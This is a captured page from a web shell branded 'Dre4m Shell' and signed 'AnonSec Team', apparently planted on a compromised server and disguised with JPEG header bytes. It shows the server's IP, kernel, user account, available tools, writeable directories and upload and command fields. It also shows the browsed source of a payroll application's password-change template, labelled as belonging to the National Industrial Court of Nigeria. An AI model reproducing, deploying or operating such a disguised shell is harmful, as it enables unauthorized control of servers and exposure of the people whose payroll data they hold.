ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.147.127.120
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/newpayroll/resources/views/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/newpayroll/resources/views/auth/editAccount.blade.php
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>National Industrial Court of Nigeria</title>
  <!-- Tell the browser to be responsive to screen width -->
  <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <link rel="stylesheet" href="{{ asset('assets/css/bootstrap.min.css') }}">
  <link rel="stylesheet" href="{{ asset('assets/font-awesome/css/font-awesome.min.css') }}">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css">
  <link rel="stylesheet" href="{{ asset('assets/css/AdminLTE.min.css') }}">
  <!-- AdminLTE Skins. Choose a skin from the css/skins
       folder instead of downloading all of them to reduce the load. -->
  <link rel="stylesheet" href="{{ asset('assets/css/select2.min.css') }}">
  <link rel="stylesheet" href="{{ asset('assets/css/_all-skins.min.css') }}">
  <link rel="stylesheet" href="{{ asset('assets/css/admin.css') }}">
 

  <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]>
  <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
  <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
  <![endif]-->
  <script> var murl = "{{ url('/')}}"; </script>
</head>
<body class="hold-transition skin-green sidebar-mini">

<div class="wrapper">

<header class="main-header">
    <!-- Logo -->
    <a href="{{url('/')}}" class="logo">
      <!-- mini logo for sidebar mini 50x50 pixels -->
      <span class="logo-mini">NICN</span>
      <!-- logo for regular state and mobile devices -->
      <span class="logo-lg"><b>NICN</b> Payroll System</span>
    </a>
    <!-- Header Navbar: style can be found in header.less -->
    <nav class="navbar navbar-static-top">
      <!-- Sidebar toggle button-->
      <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </a>

      <div class="navbar-custom-menu">
        <ul class="nav navbar-nav">
          <!-- Messages: style can be found in dropdown.less-->
        
          
          <!-- Tasks: style can be found in dropdown.less -->
          <!-- The other dropdown notification goes here -->


          <!-- End of other dropdown notification -->
          <!-- User Account: style can be found in dropdown.less -->
          <li class="user">
           @if(Entrust::hasRole('admin') or Entrust::hasRole('tax staff') or Entrust::hasRole('audit staff') or Entrust::hasRole('cpo staff') or Entrust::hasRole('super admin') or Entrust::hasRole('salary collator') or Entrust::hasRole('nhf staff') )
            <a href="{{ url('division/changeDivision')}}">
            @else  <a href="">
            @endif
              <i class="fa fa-location-arrow"></i>
              <span>
              @if(!Auth::guest())
              {{ session('division') }} <span class="hidden-xs">Division</span>
              @endif
              </span>
            </a>
           
          </li>          

          <li class="dropdown user">
            <a href="#" class="dropdown-toggle" data-toggle="dropdown">
              <i class="fa fa-user"></i>
              <span class="hidden-xs">
              @if(!Auth::guest())
              {{ Auth::user()->name }}
              @endif
              </span>
            </a>
           <ul class="dropdown-menu dropdown-user">
                 <li><a href="{{url('/user/editAccount')}}"><i class="fa fa-circle-o"></i> Edit Account</a></li>
                 <li><a href="{{ url('/logout') }}"><i class="fa fa-btn fa-sign-out"></i>Logout</a></li> 
                 @role('super admin')
                  <li role="separator" class="divider"></li>
                 <li><a href="{{url('/user/register')}}"><i class="fa fa-circle-o"></i> Create New User</a></li>
                 <li><a href="{{url('/role/create')}}"><i class="fa fa-circle-o"></i> Create Role</a></li>
                 <li><a href="{{url('/permission/create')}}"><i class="fa fa-circle-o"></i> Create Permission</a></li>
                 <li><a href="{{url('permission/permRole')}}"><i class="fa fa-circle-o"></i> Assign Permission</a></li>
                 <li><a href="{{url('/role/userRole')}}"><i class="fa fa-circle-o"></i> Assign User</a></li>
                 <li><a href="{{url('/role/viewUser')}}"><i class="fa fa-circle-o"></i> View Users</a></li>
                 @endrole  
            </ul>
          </li>          
        </ul>
      </div>
    </nav>
  </header>


<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <!-- Main content -->
    <section class="content">

      <!-- SELECT2 EXAMPLE -->
      <div class="box box-default">

      <h3 style="padding-left: 10%;">
       
         Please, Change Your Password
                   
      </h3>

  <form method="post" action="{{ url('/user/editAccount') }}">

  <div class="box-body">
        <div class="row">
            <div class="col-md-12"><!--1st col-->
                @if (count($errors) > 0)
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        @foreach ($errors->all() as $error)
                            <p>{{ $error }}</p>
                        @endforeach
                    </div>
                   
                    
                @endif
                       
                @if(session('msg'))
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
                        {{ session('msg') }}
                    </div>

                                            
                @endif

                @if(session('msgSuccess'))
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
                        {{ session('msgSuccess') }}
                    </div>

                <div class="alert alert-success alert-dismissible" role="alert">
                    <strong style="padding: 5px;">You will be redirected in <meta http-equiv="refresh" content="5;URL='{{ url('/') }}'" /> a few seconds</h3>
                    </strong>
                    @endif

                @if(session('err'))
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        {{ session('err') }}
                    </div>
                         
                @endif

                @if(session('msgReset'))
                <div class="alert btn-primary alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
                        {{ session('msgReset') }}
                    </div>
                @endif

            </div>
            {{ csrf_field() }}
            
                <div class="col-md-12"><!--2nd col-->
                                <div class="row">
                                  <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="userName">Full name</label>
                                           <input type="Text" name="fullName" class="form-control" value="{{ Auth::user()->name }}">
                                        </div>
                                  </div><div class="col-md-6">
                                        <div class="form-group">
                                          <label for="userName">User Name</label>
                                          <input type="Text" name="userName" class="form-control" value="{{ Auth::user()->username }}" readonly>
                                        </div>
                                    </div>
                                 
                                </div>
                                
                                <div class="row">
                                 <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="division">Password</label>
                                          <input type="password" name="password" class="form-control">
                                        </div>
                                  </div>  
                                  
                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="password">Confirm Password</label>
                                          <input type="password" name="password_confirmation" class="form-control">
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-md-offset-6">
                                        <div class="form-group">
                                            <label for=""></label>
                                            <div align="right">
                                                <button class="btn btn-success" type="submit"> Save Profile</button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                </div>
        </div><!-- /.col -->
    </div><!-- /.row -->
  </form>

  </div>
      <!-- /.box -->
      <div class="row">
    </section>
    <!-- /.content -->
  </div>
  <!-- /.content-wrapper -->
  <footer class="main-footer hidden-print">
    <div class="pull-right hidden-xs">
      <b>Designed by</b> <a href="http://mbrcomputers.net">MBR Computers</a>
    </div>
    <strong>Copyright &copy; <?php echo date('Y') ?> .</strong> All rights
    reserved.
  </footer>
  </div>
<!-- ./wrapper -->
<script src="{{ asset('assets/js/jQuery-2.2.0.min.js') }}"></script>
<script src="{{ asset('assets/js/bootstrap.min.js') }}"></script>
<script src="{{ asset('assets/js/app.min.js') }}"></script>
<script src="{{ asset('assets/js/demo.js') }}"></script>
<script src="{{ asset('assets/js/jquery.slimscroll.min.js') }}"></script>

<!-- <script src="{{ asset('assets/js/jquery.cookie.js') }}"></script> -->
@yield('scripts')


</body>
</html>

Anon7 - 2022
AnonSec Team